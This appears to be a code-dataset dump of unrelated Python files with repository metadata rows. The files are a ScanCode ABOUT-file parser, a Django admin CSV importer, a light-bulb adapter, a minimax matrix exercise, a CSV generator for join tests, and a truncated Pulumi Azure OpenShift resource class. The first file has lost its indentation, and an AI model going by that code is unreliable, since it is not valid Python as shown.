# See https://aboutcode.org for more information about nexB OSS projects.
#
import io
import os
from pathlib import Path
import saneyaml
from packagedcode import models
from packageurl import PackageURL
# TODO: Override get_package_resource so it returns the Resource that the ABOUT file is describing
TRACE = os.environ.get('SCANCODE_DEBUG_PACKAGE', False)
def logger_debug(*args):
pass
if TRACE:
import logging
import sys
logger = logging.getLogger(__name__)
logging.basicConfig(stream=sys.stdout)
logger.setLevel(logging.DEBUG)
def logger_debug(*args):
return logger.debug(
' '.join(isinstance(a, str) and a or repr(a) for a in args)
)
class AboutFileHandler(models.DatafileHandler):
datasource_id = 'about_file'
default_package_type = 'about'
path_patterns = ('*.ABOUT',)
description = 'AboutCode ABOUT file'
documentation_url = 'https://aboutcode-toolkit.readthedocs.io/en/latest/specification.html'
@classmethod
def parse(cls, location):
"""
Yield one or more Package manifest objects given a file ``location`` pointing to a
package archive, manifest or similar.
"""
with io.open(location, encoding='utf-8') as loc:
package_data = saneyaml.load(loc.read())
# About files can contain any purl and also have a namespace
about_type = package_data.get('type')
about_ns = package_data.get('namespace')
purl_type = None
purl_ns = None
purl = package_data.get('purl')
if purl:
purl = PackageURL.from_string(purl)
if purl:
purl_type = purl.type
package_type = about_type or purl_type or cls.default_package_type
package_ns = about_ns or purl_ns
name = package_data.get('name')
version = package_data.get('version')
homepage_url = package_data.get('home_url') or package_data.get('homepage_url')
download_url = package_data.get('download_url')
copyright_statement = package_data.get('copyright')
license_expression = package_data.get('license_expression')
declared_license = license_expression
owner = package_data.get('owner')
if not isinstance(owner, str):
owner = repr(owner)
parties = [models.Party(type=models.party_person, name=owner, role='owner')]
# FIXME: also include notice_file and license_file(s) as file_references
file_references = []
about_resource = package_data.get('about_resource')
if about_resource:
file_references.append(models.FileReference(path=about_resource))
# FIXME: we should put the unprocessed attributes in extra data
yield models.PackageData(
datasource_id=cls.datasource_id,
type=package_type,
namespace=package_ns,
name=name,
version=version,
declared_license=declared_license,
license_expression=license_expression,
copyright=copyright_statement,
parties=parties,
homepage_url=homepage_url,
download_url=download_url,
file_references=file_references,
)
@classmethod
def assemble(cls, package_data, resource, codebase):
"""
Yield a Package. Note that ABOUT files do not carry dependencies.
"""
datafile_path = resource.path
# do we have enough to create a package?
if package_data.purl:
package = models.Package.from_package_data(
package_data=package_data,
datafile_path=datafile_path,
)
package_uid = package.package_uid
# NOTE: we do not attach files to the Package level. Instead we
# update `for_package` in the file
resource.for_packages.append(package_uid)
resource.save(codebase)
if not package.license_expression:
package.license_expression = cls.compute_normalized_license(package)
yield package
if resource.pid is not None and package_data.file_references:
parent_resource = resource.parent(codebase)
if parent_resource and package_data.file_references:
root_path = Path(parent_resource.path)
# FIXME: we should be able to get the path relatively to the
# ABOUT file resource a file ref extends from the root of
# the filesystem
file_references_by_path = {
str(root_path / ref.path): ref
for ref in package.file_references
}
for res in parent_resource.walk(codebase):
ref = file_references_by_path.get(res.path)
if not ref:
continue
# path is found and processed: remove it, so we can
# check if we found all of them
del file_references_by_path[res.path]
res.for_packages.append(package_uid)
res.save(codebase)
yield res
# if we have left over file references, add these to extra data
if file_references_by_path:
missing = sorted(file_references_by_path.values(), key=lambda r: r.path)
package.extra_data['missing_file_references'] = missing
else:
package.extra_data['missing_file_references'] = package_data.file_references[:]
# we yield this as we do not want this further processed
yield resource
| 36.25 | 98 | 0.621182 | 715 | 6,090 | 5.106294 | 0.296504 | 0.06327 | 0.046015 | 0.02739 | 0.050397 | 0.020268 | 0 | 0 | 0 | 0 | 0 | 0.001184 | 0.306732 | 6,090 | 167 | 99 | 36.467066 | 0.863572 | 0.209852 | 0 | 0.057143 | 0 | 0 | 0.0625 | 0.014358 | 0 | 0 | 0 | 0.017964 | 0 | 1 | 0.038095 | false | 0.009524 | 0.07619 | 0.009524 | 0.180952 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4061e49b5b1d7dddbcbb3f8df2b62b73c065877a | 2,359 | py | Python | gazepattern/eyedetector/admin.py | AriRodriguezCruz/mcfgpr | c6f83f8e68bbab0054a7ea337feab276fc0790fc | [
"MIT"
] | null | null | null | gazepattern/eyedetector/admin.py | AriRodriguezCruz/mcfgpr | c6f83f8e68bbab0054a7ea337feab276fc0790fc | [
"MIT"
] | 12 | 2020-06-05T22:56:39.000Z | 2022-02-10T10:35:13.000Z | gazepattern/eyedetector/admin.py | AriRodriguezCruz/mcfgpr | c6f83f8e68bbab0054a7ea337feab276fc0790fc | [
"MIT"
] | 1 | 2019-10-06T23:40:45.000Z | 2019-10-06T23:40:45.000Z | # -*- coding: utf-8 -*-
#django
from django.contrib import admin
from django.db import transaction
#python
import csv
from decimal import Decimal
#gazepattern
from .models import Experiment, ExperimentPoint, Image, ImageRectangle, ExperimentPointCSV, ExperimentFunction
@transaction.atomic
def procesar(modeladmin, request, queryset):
for query in queryset:
file = query.file
with open(file.path) as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
rows = [row for row in csv_reader if len(row)]
for row in rows:
experiment_id = int(row[0])
fixation_number = int(row[1])
x = Decimal(row[2])
y = Decimal(row[3])
experiment = Experiment.objects.get(pk=experiment_id)
experiment_point = ExperimentPoint()
experiment_point.experiment = experiment
experiment_point.fixation_number = fixation_number
experiment_point.x = x
experiment_point.y = y
experiment_point.save()
procesar.short_description = "Procesar CSV para generar experiments points"
class ExperimentPointCSVAdmin(admin.ModelAdmin):
list_display = ['id', 'file']
ordering = ['id']
actions = [procesar, ]
class ExperimentPointAdmin(admin.ModelAdmin):
list_display = ['id', 'experiment_id', 'fixation_number', 'x', 'y']
ordering = ['id']
search_fields = ["experiment__id"]
class ImageAdmin(admin.ModelAdmin):
list_display = ['id', 'name']
ordering = ['id']
class ExperimentAdmin(admin.ModelAdmin):
list_display = ['id', 'name', 'description']
ordering = ['id']
class ImageRectangleAdmin(admin.ModelAdmin):
list_display = ['id', 'image_id','name']
ordering = ['id']
search_fields = ['image__id']
class ExperimentFunctionAdmin(admin.ModelAdmin):
list_display = ['id', 'experiment_id', 'function']
ordering = ['id']
search_fields = ['experiment__id']
admin.site.register(ExperimentPointCSV, ExperimentPointCSVAdmin)
admin.site.register(ExperimentPoint, ExperimentPointAdmin)
admin.site.register(Image, ImageAdmin)
admin.site.register(Experiment, ExperimentAdmin)
admin.site.register(ImageRectangle, ImageRectangleAdmin)
admin.site.register(ExperimentFunction, ExperimentFunctionAdmin) | 31.878378 | 110 | 0.676982 | 245 | 2,359 | 6.37551 | 0.322449 | 0.046095 | 0.072983 | 0.099872 | 0.171575 | 0.135723 | 0.051216 | 0 | 0 | 0 | 0 | 0.00269 | 0.211954 | 2,359 | 74 | 111 | 31.878378 | 0.837547 | 0.018652 | 0 | 0.113208 | 0 | 0 | 0.083081 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.018868 | false | 0 | 0.09434 | 0 | 0.528302 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
406203c920d38242adfa5e5ed2a39070a52fd1c1 | 373 | py | Python | codigo/hexagonal/app/adapter/light_bulb_repository.py | VulturARG/charla_01 | 43a53fded4f3205a02b00993a523e2f94b79fc99 | [
"Apache-2.0"
] | null | null | null | codigo/hexagonal/app/adapter/light_bulb_repository.py | VulturARG/charla_01 | 43a53fded4f3205a02b00993a523e2f94b79fc99 | [
"Apache-2.0"
] | null | null | null | codigo/hexagonal/app/adapter/light_bulb_repository.py | VulturARG/charla_01 | 43a53fded4f3205a02b00993a523e2f94b79fc99 | [
"Apache-2.0"
] | null | null | null | from codigo.hexagonal.app.domain.switchable_repository import Switchable
class LightBulb(Switchable):
def turn_on(self) -> bool:
print("Connecting with the device...")
print("The light is on")
return True
def turn_off(self) -> bool:
print("The light is off")
print("Disconnecting with the device...")
return False
| 26.642857 | 72 | 0.646113 | 46 | 373 | 5.173913 | 0.586957 | 0.058824 | 0.109244 | 0.12605 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.24933 | 373 | 13 | 73 | 28.692308 | 0.85 | 0 | 0 | 0 | 0 | 0 | 0.246649 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.1 | 0 | 0.6 | 0.4 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
4062ba894ee618c56f6c5822e3859495a6c3298f | 541 | py | Python | aula12/ex1.py | otaviobizulli/python-exercices | 2c61f014bf481fa463721b174ddd4238bf8d0cb3 | [
"MIT"
] | null | null | null | aula12/ex1.py | otaviobizulli/python-exercices | 2c61f014bf481fa463721b174ddd4238bf8d0cb3 | [
"MIT"
] | null | null | null | aula12/ex1.py | otaviobizulli/python-exercices | 2c61f014bf481fa463721b174ddd4238bf8d0cb3 | [
"MIT"
] | null | null | null | from random import randint
menor = 100
linha = 0
maior = 0
m = []
for i in range(10):
m.append([])
for j in range(10):
m[i].append(randint(1,99))
for i in range(10):
for j in range(10):
print(f'{m[i][j]:2}',end=' ')
print()
for i in range(10):
for j in range(10):
if m[i][j] > maior:
maior = m[i][j]
linha = i
for i in range(10):
if m[linha][i] < menor:
menor = m[linha][i]
print(f'o minimax é {menor}, com o maior sendo {maior} na linha {linha+1}.')
| 16.393939 | 76 | 0.51756 | 97 | 541 | 2.886598 | 0.309278 | 0.175 | 0.225 | 0.157143 | 0.346429 | 0.185714 | 0.185714 | 0.185714 | 0.185714 | 0.185714 | 0 | 0.064343 | 0.310536 | 541 | 32 | 77 | 16.90625 | 0.686327 | 0 | 0 | 0.318182 | 0 | 0 | 0.145794 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.045455 | 0 | 0.045455 | 0.136364 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4067cec9a6ceb8438c7e66edc2d29eb2148964ae | 1,323 | py | Python | sql/src/test/resources/joins/create_sample_table.py | MichelaSalvemini/Modelli_project | b70d505f9c3fef4a5f857fdccaa60b1b64c8a71d | [
"Apache-2.0"
] | 677 | 2016-01-04T04:05:50.000Z | 2022-03-24T06:37:27.000Z | sql/src/test/resources/joins/create_sample_table.py | MichelaSalvemini/Modelli_project | b70d505f9c3fef4a5f857fdccaa60b1b64c8a71d | [
"Apache-2.0"
] | 249 | 2015-12-29T03:41:31.000Z | 2020-09-02T03:11:30.000Z | sql/src/test/resources/joins/create_sample_table.py | MichelaSalvemini/Modelli_project | b70d505f9c3fef4a5f857fdccaa60b1b64c8a71d | [
"Apache-2.0"
] | 148 | 2015-12-29T03:25:48.000Z | 2021-08-25T03:59:52.000Z | #! /usr/bin/env python
from __future__ import print_function
import pandas as pd
import numpy as np
import argparse
def generate_csv(start_index, fname):
cols = [
str('A' + str(i)) for i in range(start_index, NUM_COLS + start_index)
]
data = []
for i in range(NUM_ROWS):
vals = (np.random.choice(NUM_DISTINCT_VALS) for j in range(NUM_COLS))
data.append(vals)
df = pd.DataFrame(data=data, columns=cols)
df.to_csv(fname, index=False, header=True)
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description='Generate sample tables to test joins.')
parser.add_argument('--num-rows', '-r', type=int, default=100)
parser.add_argument('--num-cols', '-c', type=int, required=True)
parser.add_argument('--num-distinct-vals', '-d', type=int, required=True)
parser.add_argument('--num-cols-overlap', '-o', type=int, default=1)
args = parser.parse_args()
NUM_ROWS = args.num_rows
NUM_COLS = args.num_cols
NUM_DISTINCT_VALS = args.num_distinct_vals
num_overlap = args.num_cols_overlap
if num_overlap > NUM_COLS:
print('--num-cols-overlap cannot be greater than --num-cols')
import sys
sys.exit(1)
generate_csv(0, 'table_a.csv')
generate_csv(NUM_COLS - num_overlap, 'table_b.csv')
| 30.068182 | 77 | 0.670446 | 195 | 1,323 | 4.307692 | 0.4 | 0.091667 | 0.071429 | 0.095238 | 0.12619 | 0.092857 | 0.092857 | 0.092857 | 0 | 0 | 0 | 0.00565 | 0.197279 | 1,323 | 43 | 78 | 30.767442 | 0.785311 | 0.015873 | 0 | 0 | 1 | 0 | 0.142198 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.03125 | false | 0 | 0.15625 | 0 | 0.1875 | 0.0625 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
40686c4879d63aced85e26a35f076b9028592fdb | 24,660 | py | Python | sdk/python/pulumi_azure_native/containerservice/v20191027preview/open_shift_managed_cluster.py | sebtelko/pulumi-azure-native | 711ec021b5c73da05611c56c8a35adb0ce3244e4 | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_native/containerservice/v20191027preview/open_shift_managed_cluster.py | sebtelko/pulumi-azure-native | 711ec021b5c73da05611c56c8a35adb0ce3244e4 | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_native/containerservice/v20191027preview/open_shift_managed_cluster.py | sebtelko/pulumi-azure-native | 711ec021b5c73da05611c56c8a35adb0ce3244e4 | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
from ._enums import *
from ._inputs import *
__all__ = ['OpenShiftManagedClusterArgs', 'OpenShiftManagedCluster']
@pulumi.input_type
class OpenShiftManagedClusterArgs:
def __init__(__self__, *,
open_shift_version: pulumi.Input[str],
resource_group_name: pulumi.Input[str],
agent_pool_profiles: Optional[pulumi.Input[Sequence[pulumi.Input['OpenShiftManagedClusterAgentPoolProfileArgs']]]] = None,
auth_profile: Optional[pulumi.Input['OpenShiftManagedClusterAuthProfileArgs']] = None,
location: Optional[pulumi.Input[str]] = None,
master_pool_profile: Optional[pulumi.Input['OpenShiftManagedClusterMasterPoolProfileArgs']] = None,
monitor_profile: Optional[pulumi.Input['OpenShiftManagedClusterMonitorProfileArgs']] = None,
network_profile: Optional[pulumi.Input['NetworkProfileArgs']] = None,
plan: Optional[pulumi.Input['PurchasePlanArgs']] = None,
refresh_cluster: Optional[pulumi.Input[bool]] = None,
resource_name: Optional[pulumi.Input[str]] = None,
router_profiles: Optional[pulumi.Input[Sequence[pulumi.Input['OpenShiftRouterProfileArgs']]]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a OpenShiftManagedCluster resource.
:param pulumi.Input[str] open_shift_version: Version of OpenShift specified when creating the cluster.
:param pulumi.Input[str] resource_group_name: The name of the resource group.
:param pulumi.Input[Sequence[pulumi.Input['OpenShiftManagedClusterAgentPoolProfileArgs']]] agent_pool_profiles: Configuration of OpenShift cluster VMs.
:param pulumi.Input['OpenShiftManagedClusterAuthProfileArgs'] auth_profile: Configures OpenShift authentication.
:param pulumi.Input[str] location: Resource location
:param pulumi.Input['OpenShiftManagedClusterMasterPoolProfileArgs'] master_pool_profile: Configuration for OpenShift master VMs.
:param pulumi.Input['OpenShiftManagedClusterMonitorProfileArgs'] monitor_profile: Configures Log Analytics integration.
:param pulumi.Input['NetworkProfileArgs'] network_profile: Configuration for OpenShift networking.
:param pulumi.Input['PurchasePlanArgs'] plan: Define the resource plan as required by ARM for billing purposes
:param pulumi.Input[bool] refresh_cluster: Allows node rotation
:param pulumi.Input[str] resource_name: The name of the OpenShift managed cluster resource.
:param pulumi.Input[Sequence[pulumi.Input['OpenShiftRouterProfileArgs']]] router_profiles: Configuration for OpenShift router(s).
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags
"""
pulumi.set(__self__, "open_shift_version", open_shift_version)
pulumi.set(__self__, "resource_group_name", resource_group_name)
if agent_pool_profiles is not None:
pulumi.set(__self__, "agent_pool_profiles", agent_pool_profiles)
if auth_profile is not None:
pulumi.set(__self__, "auth_profile", auth_profile)
if location is not None:
pulumi.set(__self__, "location", location)
if master_pool_profile is not None:
pulumi.set(__self__, "master_pool_profile", master_pool_profile)
if monitor_profile is not None:
pulumi.set(__self__, "monitor_profile", monitor_profile)
if network_profile is not None:
pulumi.set(__self__, "network_profile", network_profile)
if plan is not None:
pulumi.set(__self__, "plan", plan)
if refresh_cluster is not None:
pulumi.set(__self__, "refresh_cluster", refresh_cluster)
if resource_name is not None:
pulumi.set(__self__, "resource_name", resource_name)
if router_profiles is not None:
pulumi.set(__self__, "router_profiles", router_profiles)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="openShiftVersion")
def open_shift_version(self) -> pulumi.Input[str]:
"""
Version of OpenShift specified when creating the cluster.
"""
return pulumi.get(self, "open_shift_version")
@open_shift_version.setter
def open_shift_version(self, value: pulumi.Input[str]):
pulumi.set(self, "open_shift_version", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="agentPoolProfiles")
def agent_pool_profiles(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['OpenShiftManagedClusterAgentPoolProfileArgs']]]]:
"""
Configuration of OpenShift cluster VMs.
"""
return pulumi.get(self, "agent_pool_profiles")
@agent_pool_profiles.setter
def agent_pool_profiles(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['OpenShiftManagedClusterAgentPoolProfileArgs']]]]):
pulumi.set(self, "agent_pool_profiles", value)
@property
@pulumi.getter(name="authProfile")
def auth_profile(self) -> Optional[pulumi.Input['OpenShiftManagedClusterAuthProfileArgs']]:
"""
Configures OpenShift authentication.
"""
return pulumi.get(self, "auth_profile")
@auth_profile.setter
def auth_profile(self, value: Optional[pulumi.Input['OpenShiftManagedClusterAuthProfileArgs']]):
pulumi.set(self, "auth_profile", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
Resource location
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter(name="masterPoolProfile")
def master_pool_profile(self) -> Optional[pulumi.Input['OpenShiftManagedClusterMasterPoolProfileArgs']]:
"""
Configuration for OpenShift master VMs.
"""
return pulumi.get(self, "master_pool_profile")
@master_pool_profile.setter
def master_pool_profile(self, value: Optional[pulumi.Input['OpenShiftManagedClusterMasterPoolProfileArgs']]):
pulumi.set(self, "master_pool_profile", value)
@property
@pulumi.getter(name="monitorProfile")
def monitor_profile(self) -> Optional[pulumi.Input['OpenShiftManagedClusterMonitorProfileArgs']]:
"""
Configures Log Analytics integration.
"""
return pulumi.get(self, "monitor_profile")
@monitor_profile.setter
def monitor_profile(self, value: Optional[pulumi.Input['OpenShiftManagedClusterMonitorProfileArgs']]):
pulumi.set(self, "monitor_profile", value)
@property
@pulumi.getter(name="networkProfile")
def network_profile(self) -> Optional[pulumi.Input['NetworkProfileArgs']]:
"""
Configuration for OpenShift networking.
"""
return pulumi.get(self, "network_profile")
@network_profile.setter
def network_profile(self, value: Optional[pulumi.Input['NetworkProfileArgs']]):
pulumi.set(self, "network_profile", value)
@property
@pulumi.getter
def plan(self) -> Optional[pulumi.Input['PurchasePlanArgs']]:
"""
Define the resource plan as required by ARM for billing purposes
"""
return pulumi.get(self, "plan")
@plan.setter
def plan(self, value: Optional[pulumi.Input['PurchasePlanArgs']]):
pulumi.set(self, "plan", value)
@property
@pulumi.getter(name="refreshCluster")
def refresh_cluster(self) -> Optional[pulumi.Input[bool]]:
"""
Allows node rotation
"""
return pulumi.get(self, "refresh_cluster")
@refresh_cluster.setter
def refresh_cluster(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "refresh_cluster", value)
@property
@pulumi.getter(name="resourceName")
def resource_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the OpenShift managed cluster resource.
"""
return pulumi.get(self, "resource_name")
@resource_name.setter
def resource_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_name", value)
@property
@pulumi.getter(name="routerProfiles")
def router_profiles(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['OpenShiftRouterProfileArgs']]]]:
"""
Configuration for OpenShift router(s).
"""
return pulumi.get(self, "router_profiles")
@router_profiles.setter
def router_profiles(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['OpenShiftRouterProfileArgs']]]]):
pulumi.set(self, "router_profiles", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Resource tags
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
class OpenShiftManagedCluster(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
agent_pool_profiles: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['OpenShiftManagedClusterAgentPoolProfileArgs']]]]] = None,
auth_profile: Optional[pulumi.Input[pulumi.InputType['OpenShiftManagedClusterAuthProfileArgs']]] = None,
location: Optional[pulumi.Input[str]] = None,
master_pool_profile: Optional[pulumi.Input[pulumi.InputType['OpenShiftManagedClusterMasterPoolProfileArgs']]] = None,
monitor_profile: Optional[pulumi.Input[pulumi.InputType['OpenShiftManagedClusterMonitorProfileArgs']]] = None,
network_profile: Optional[pulumi.Input[pulumi.InputType['NetworkProfileArgs']]] = None,
open_shift_version: Optional[pulumi.Input[str]] = None,
plan: Optional[pulumi.Input[pulumi.InputType['PurchasePlanArgs']]] = None,
refresh_cluster: Optional[pulumi.Input[bool]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
resource_name_: Optional[pulumi.Input[str]] = None,
router_profiles: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['OpenShiftRouterProfileArgs']]]]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
"""
OpenShift Managed cluster.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['OpenShiftManagedClusterAgentPoolProfileArgs']]]] agent_pool_profiles: Configuration of OpenShift cluster VMs.
:param pulumi.Input[pulumi.InputType['OpenShiftManagedClusterAuthProfileArgs']] auth_profile: Configures OpenShift authentication.
:param pulumi.Input[str] location: Resource location
:param pulumi.Input[pulumi.InputType['OpenShiftManagedClusterMasterPoolProfileArgs']] master_pool_profile: Configuration for OpenShift master VMs.
:param pulumi.Input[pulumi.InputType['OpenShiftManagedClusterMonitorProfileArgs']] monitor_profile: Configures Log Analytics integration.
:param pulumi.Input[pulumi.InputType['NetworkProfileArgs']] network_profile: Configuration for OpenShift networking.
:param pulumi.Input[str] open_shift_version: Version of OpenShift specified when creating the cluster.
:param pulumi.Input[pulumi.InputType['PurchasePlanArgs']] plan: Define the resource plan as required by ARM for billing purposes
:param pulumi.Input[bool] refresh_cluster: Allows node rotation
:param pulumi.Input[str] resource_group_name: The name of the resource group.
:param pulumi.Input[str] resource_name_: The name of the OpenShift managed cluster resource.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['OpenShiftRouterProfileArgs']]]] router_profiles: Configuration for OpenShift router(s).
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: OpenShiftManagedClusterArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
OpenShift Managed cluster.
:param str resource_name: The name of the resource.
:param OpenShiftManagedClusterArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(OpenShiftManagedClusterArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
agent_pool_profiles: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['OpenShiftManagedClusterAgentPoolProfileArgs']]]]] = None,
auth_profile: Optional[pulumi.Input[pulumi.InputType['OpenShiftManagedClusterAuthProfileArgs']]] = None,
location: Optional[pulumi.Input[str]] = None,
master_pool_profile: Optional[pulumi.Input[pulumi.InputType['OpenShiftManagedClusterMasterPoolProfileArgs']]] = None,
monitor_profile: Optional[pulumi.Input[pulumi.InputType['OpenShiftManagedClusterMonitorProfileArgs']]] = None,
network_profile: Optional[pulumi.Input[pulumi.InputType['NetworkProfileArgs']]] = None,
open_shift_version: Optional[pulumi.Input[str]] = None,
plan: Optional[pulumi.Input[pulumi.InputType['PurchasePlanArgs']]] = None,
refresh_cluster: Optional[pulumi.Input[bool]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
resource_name_: Optional[pulumi.Input[str]] = None,
router_profiles: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['OpenShiftRouterProfileArgs']]]]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = OpenShiftManagedClusterArgs.__new__(OpenShiftManagedClusterArgs)
__props__.__dict__["agent_pool_profiles"] = agent_pool_profiles
__props__.__dict__["auth_profile"] = auth_profile
__props__.__dict__["location"] = location
__props__.__dict__["master_pool_profile"] = master_pool_profile
__props__.__dict__["monitor_profile"] = monitor_profile
__props__.__dict__["network_profile"] = network_profile
if open_shift_version is None and not opts.urn:
raise TypeError("Missing required property 'open_shift_version'")
__props__.__dict__["open_shift_version"] = open_shift_version
__props__.__dict__["plan"] = plan
__props__.__dict__["refresh_cluster"] = refresh_cluster
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["resource_name"] = resource_name_
__props__.__dict__["router_profiles"] = router_profiles
__props__.__dict__["tags"] = tags
__props__.__dict__["cluster_version"] = None
__props__.__dict__["fqdn"] = None
__props__.__dict__["name"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["public_hostname"] = None
__props__.__dict__["type"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:containerservice/v20191027preview:OpenShiftManagedCluster"), pulumi.Alias(type_="azure-native:containerservice:OpenShiftManagedCluster"), pulumi.Alias(type_="azure-nextgen:containerservice:OpenShiftManagedCluster"), pulumi.Alias(type_="azure-native:containerservice/v20180930preview:OpenShiftManagedCluster"), pulumi.Alias(type_="azure-nextgen:containerservice/v20180930preview:OpenShiftManagedCluster"), pulumi.Alias(type_="azure-native:containerservice/v20190430:OpenShiftManagedCluster"), pulumi.Alias(type_="azure-nextgen:containerservice/v20190430:OpenShiftManagedCluster"), pulumi.Alias(type_="azure-native:containerservice/v20190930preview:OpenShiftManagedCluster"), pulumi.Alias(type_="azure-nextgen:containerservice/v20190930preview:OpenShiftManagedCluster")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(OpenShiftManagedCluster, __self__).__init__(
'azure-native:containerservice/v20191027preview:OpenShiftManagedCluster',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'OpenShiftManagedCluster':
"""
Get an existing OpenShiftManagedCluster resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = OpenShiftManagedClusterArgs.__new__(OpenShiftManagedClusterArgs)
__props__.__dict__["agent_pool_profiles"] = None
__props__.__dict__["auth_profile"] = None
__props__.__dict__["cluster_version"] = None
__props__.__dict__["fqdn"] = None
__props__.__dict__["location"] = None
__props__.__dict__["master_pool_profile"] = None
__props__.__dict__["monitor_profile"] = None
__props__.__dict__["name"] = None
__props__.__dict__["network_profile"] = None
